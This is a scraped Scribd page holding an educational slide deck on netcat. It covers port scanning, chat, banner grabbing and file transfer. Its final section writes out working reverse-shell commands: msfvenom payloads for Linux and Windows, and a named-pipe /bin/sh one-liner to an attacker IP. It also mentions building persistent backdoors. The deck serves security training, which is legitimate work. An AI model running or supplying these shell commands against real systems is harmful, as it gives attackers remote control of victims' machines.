Scribd Logo
Upload

Welcome to Scribd!

  • 172 views

    Netcat: Present by Bhargav Borkhatariya

    Uploaded by

    music Master
    Netcat is a networking utility that can be used for both attacking systems and security auditing. It allows port scanning, file transfer, banner grabbing, and creating reverse shells. Netcat is a versatile tool that security professionals use for debugging networks and that attackers use for exploitation. It can be used to scan ports, transfer files between systems, create chatting connections, and obtain reverse shells on Windows and Linux systems, making it a valuable tool for both offensive and defensive security work.

    Copyright:

    © All Rights Reserved
    Download as PPTX, PDF, TXT or read online from Scribd

    Netcat: Present by Bhargav Borkhatariya

    Uploaded by

    music Master
    172 views20 pages
    Netcat is a networking utility that can be used for both attacking systems and security auditing. It allows port scanning, file transfer, banner grabbing, and creating reverse shells. Netcat is a versatile tool that security professionals use for debugging networks and that attackers use for exploitation. It can be used to scan ports, transfer files between systems, create chatting connections, and obtain reverse shells on Windows and Linux systems, making it a valuable tool for both offensive and defensive security work.

    Original Title

    NetCat

    Copyright

    © © All Rights Reserved

    Available Formats

    PPTX, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Netcat is a networking utility that can be used for both attacking systems and security auditing. It allows port scanning, file transfer, banner grabbing, and creating reverse shells. Netcat is a versatile tool that security professionals use for debugging networks and that attackers use for exploitation. It can be used to scan ports, transfer files between systems, create chatting connections, and obtain reverse shells on Windows and Linux systems, making it a valuable tool for both offensive and defensive security work.

    Copyright:

    © All Rights Reserved
    Download as PPTX, PDF, TXT or read online from Scribd
    Download as pptx, pdf, or txt
    172 views20 pages

    Netcat: Present by Bhargav Borkhatariya

    Uploaded by

    music Master
    Netcat is a networking utility that can be used for both attacking systems and security auditing. It allows port scanning, file transfer, banner grabbing, and creating reverse shells. Netcat is a versatile tool that security professionals use for debugging networks and that attackers use for exploitation. It can be used to scan ports, transfer files between systems, create chatting connections, and obtain reverse shells on Windows and Linux systems, making it a valuable tool for both offensive and defensive security work.

    Copyright:

    © All Rights Reserved
    Download as PPTX, PDF, TXT or read online from Scribd
    Download as pptx, pdf, or txt
    You are on page 1of 20
    At a glance
    Powered by AI
    The key takeaways are that netcat is a versatile networking utility that can be used for tasks like port scanning, file transfer, reverse shells, and chatting between systems.

    Some of the main uses of netcat include port scanning, file transfer, banner grabbing, reverse shells, and chatting between systems.

    Netcat can be used to scan ports using the -z flag without sending data. Specifying a range of ports allows it to scan for open TCP and UDP ports.

    NetCat

    Present by Bhargav Borkhatariya.


    Introduction.

     We usually use Netcat to get reverse shell, but from port scanning,
    file transfer to banner grabbing and exploit, everything is possible
    with netcat.
     In our presentation i just explain and show basic features of netcat.
    What is netcat?

     Netcat aka nc is a network utility for reading from and writing to


    network connections using TCP and UDP. Netcat is very useful to both
    attacks and the network security auditors.
     For an attacking purpose it is a multi-functional tool which accurate
    and useful. Security auditors uses Netcat to debug and investigate the
    network.
    To start with netcat we just check the help section of netcat by using
    following command:
     Command : nc –h
    Port scanning With netcat.

     Netcat can be used as a port scanner. Netcat is not created for port
    scanning, but if we use -z flag then we are able to do it. -z flag used
    to scan listing daemon without sending any data. This makes it
    possible to understand the type of service that is running on that
    specific port. Netcat can perform both TCP and UDP scan.
    TCP scan with netcat.

     To scan a target machine we run following command:


     Command: nc -v -n -z 192.168.122.48 10-400
     Here we have used some flags, -v flag is used for verbose mode, -n
    indicates numeric-only IP address and -z indicates zero -I/O model
    (basically used for scanning).
    We also need to specify a range of ports (10 to 400) and we get the
    result as shown in the following screenshot:
    Output of TCP scanning.

    • On the above screenshot we can see that closed ports


    connections are refused and opened TCP ports get a
    successful connection. On this way we can scan for
    TCP ports via Netcat.
    UDP scan with netcat.

    • We also can scan the UDP ports using Netcat. With


    the help of following command we have scanned
    UDP port using netcat.
    • Command: nc -vzu 192.168.122.48 20-100
    • Here we have used -u flag for scanning UDP ports,
    as seen in the following screenshot:
    Chatting With netcat.

     Two users can chat through netcat. But before that they need to
    establish connection. To set all this we gonna use two different
    devices. One OS is Elementary OS and another is our fab Kali. To set
    up the connection we need to know the IP address of systems (In our
    case we are using local IP).
    From a device we can start the initiator. We run following command
    from our Elementary OS to start initiator:
     nc 192.168.225.54 12345
     Here the IP address is our Elementary OS's local IP address and we
    have chosen port number 12345 for just an example. As we can see in
    the following screenshot:
    Chatting with netcat.

    • Now from our Kali Linux we use following command to start


    listener.
    Command: nc -lvp 12345
    • Here -l flag used for listen mode, v is used for verbose mode
    and p is used for local port.
    • Now the connection has been setup and both system are
    capable to communicate to each other.
    Chatting with netcat.

    • Where we are not in our local network we can use our


    external IP in the place of local IP and forward our
    selected port on initiator system.
    Banner grabbing using netcat.

    • Banner grabbing is collection of information from the host


    machine. We also can do it using netcat. We run following
    command to see information of services running on a specific
    port:
    • Command: nc 192.168.122.48 21
    • In the following screenshot we can see version of running
    services on the port.
    • Here on the above screenshot we can see its running vsFTPd version
    2.3.4.
    File transfer via netcat.

     Netcat also offers an ability to transfer or share files from on device


    to other device. This is quite similar process of sending texts.
     We have a text file named file.txt on our Kali Linux system, to share
    it we use following command:
     Command: nc -lvp 2345 < file.txt
    File transfer via netcat.

    • The following screenshot shows that shearing is started.


    File transfer via netcat.

    • Now we can downloaded it from


    another system. Here for an example
    we have used Termux terminal from
    our android device. From other
    device we need to run following
    command to save the file. Here we
    need the IP address of our Kali Linux
    machine (we are using local IP).
    • (nc 192.168.225.54 2345 > file.txt)
    Command.
    • We can see it on the following
    screenshots:
    • The above display shows the output
    of Kali Linux and the lower part of
    above screenshot shows the fie we
    have received on our android device
    using Netcat.
    Reverse shell using netcat.

     Everyone knows that netcat have a major role to exploit target machines. This is
    very helpful for CTF players and bounty hunters. This also works with Metasploit
    payloads.
     Linux Reverse Shell
     We can easily create a reverse shell with the help of "msfvenom" and setup the
    listener using netcat. For a Linux system as target we can use following command:
     Code: msfvenom -p cmd/unix/reverse_netcat lhost=192.168.122.1 lport=6666 R
     Here we used R flag used to generate a raw payload (Just the command).
     After creating the payload we can just need to run it to target machine but before
    that we start a netcat listener on attacker machine by using following command:
     Code: nc -lvp 666
    Reverse shell using netcat.

    • Whenever the target runs the payload we'll get the session. We can
    see that in the following screenshot:

    • Sometimes for security reason we might not get the session using above
    method. In that case we can start netcat listener on 443 port using following
    command:
    • Code: nc -lvp 443
    • Then we just need to execute following commands on target Linux machine:
    • Code: mknod /tmp/backpipe p
    • /bin/sh 0</tmp/backpipe | nc 192.168.122.1 443 1>/tmp/backpipe
    • BANG! We got shell!
    Window reverse connection.

     We can get target windows system's command prompt on attacker machine


    easily.
     To do that we just need to start the listener on attacker machine (Kali Linux)
    by applying following command:
     On the target Windows system we just need to run following command on
    command prompt (Windows CMD):
    Window reverse connection.

    • Just after that


    we can easily
    get the
    command
    prompt of the
    target machine
    on our attacker
    terminal. As we
    can see in the
    following
    screenshot:
    Window reverse connection.

     If we need to create a payload in .exe file then we need to create a


    "msfvenom" payload by applying following command:
     msfvenom -p windows/shell_reverse_tcp lhost=192.168.122.1 lport=4444 –f
    exe > shell.exe
     This command will create a shell.exe file. If the target Windows system runs
    the exe file then we got the shell by opening listener on that specific port.
     We also can create persistence backdoor on Windows using Netcat.
     Netcat is very important for cybersecurity experts and bug bounty hunters.
    We can do almost anything using Netcat. We hope we got a clear idea on
    Netcat and it's uses.
    Thank you.

    You might also like